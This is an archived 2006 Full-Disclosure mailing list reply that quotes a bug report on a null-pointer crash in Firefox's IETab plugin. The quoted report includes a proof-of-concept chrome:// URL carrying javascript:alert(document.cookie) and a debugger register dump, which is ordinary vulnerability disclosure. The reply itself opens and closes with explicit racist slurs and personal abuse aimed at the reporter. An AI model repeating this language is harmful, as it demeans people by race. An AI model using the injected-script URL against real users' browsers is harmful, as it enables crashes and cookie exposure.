lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
Message-ID: <631ac1d90605172225lb314a6bvc086082cea939eac@mail.gmail.com>
Date: Thu May 18 06:25:31 2006
From: perfect.material at gmail.com (PERFECT.MATERIAL)
Subject: Firefox (with IETab Plugin) Null Pointer
	Dereferences Bug

Dear Tan Colored Niggerish Guy,

This is not the right list for Mozilla extension bug reports. This list is
for security stuff only guy :)

PERFECT.MATERIAL

P.S. Your race smells bad you worthless idiot!

On 5/17/06, Debasis Mohanty <debasis.mohanty.listmails@...il.com> wrote:
>
> Firefox (with IETab Plugin) Null Pointer Dereferences Bug
> ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
> Vendor: Mozilla
> Product: FireFox with IE Tab
>
> Bugzilla ID: 14151 (http://bugzilla.mozdev.org/show_bug.cgi?id=14151)
> (Initially I incorrectly logged the bug under the wrong product,
> thanks to Dan Veditz to log it under appropriate product on behalf of
> me).
>
> Tested On:
> FireFox Version 1.5.0.3 + IE Tab Version 1.0.9 + Windows (XP / 2K)
>
> Introduction:
> IETab (https://addons.mozilla.org/firefox/1419/) is a recently
> released (April 12, 2006) plugin for Firefox. It is used to browse IE
> (only) specific sites under Firefox. Guess what ?? You can run
> windowsupdate under FireFox
> ;-)
>
> Bug Details:
> Firefox with the IETab installed crashes when ietab plugin is unable
> to handle specific javascripts. It seems to be a null pointer
> dereference bug.
> For more details refer the PoC section.
>
> Proof-of-Concept:
> Copy & paste the following URL to the Firefox addressbar and press enter -
>
> chrome://ietab/content/reloaded.html?url=javascript:alert(document.cookie
> );
>
> Note: This test will not work if IETab is not installed.
>
> The Registers details after the crash:
>
> (1e4.3e0): Access violation - code c0000005 (first chance) First
> chance exceptions are reported before any exception handling.
> This exception may be expected and handled.
> eax=00000000 ebx=00000000 ecx=019499b4 edx=00000000 esi=7712174b
> edi=00000000
> eip=0192e7dc esp=0012eac4 ebp=00000000 iopl=0         nv up ei pl zr na po
> nc
> cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000
> efl=00010246
>
> npietab!NP_GetEntryPoints+0xb8ac:
>
> 0192e7dc 668b10           mov     dx,[eax]
> ds:0023:00000000=????
> 0:000> g
> (1e4.3e0): Access violation - code c0000005 (!!! second chance !!!)
> eax=00000000 ebx=00000000 ecx=019499b4 edx=00000000 esi=7712174b
> edi=00000000
> eip=0192e7dc esp=0012eac4 ebp=00000000 iopl=0         nv up ei pl zr na po
> nc
> cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000
> efl=00000246
> npietab!NP_GetEntryPoints+0xb8ac:
> 0192e7dc 668b10           mov     dx,[eax]
> ds:0023:00000000=????
>
>
>
> For more vulnerabilities :
> http://hackingspirits.com/vuln-rnd/vuln-rnd.html
>
>
> Credits:
> Debasis Mohanty (aka Tr0y)
> www.hackingspirits.com
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20060518/519abcae/attachment.html

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ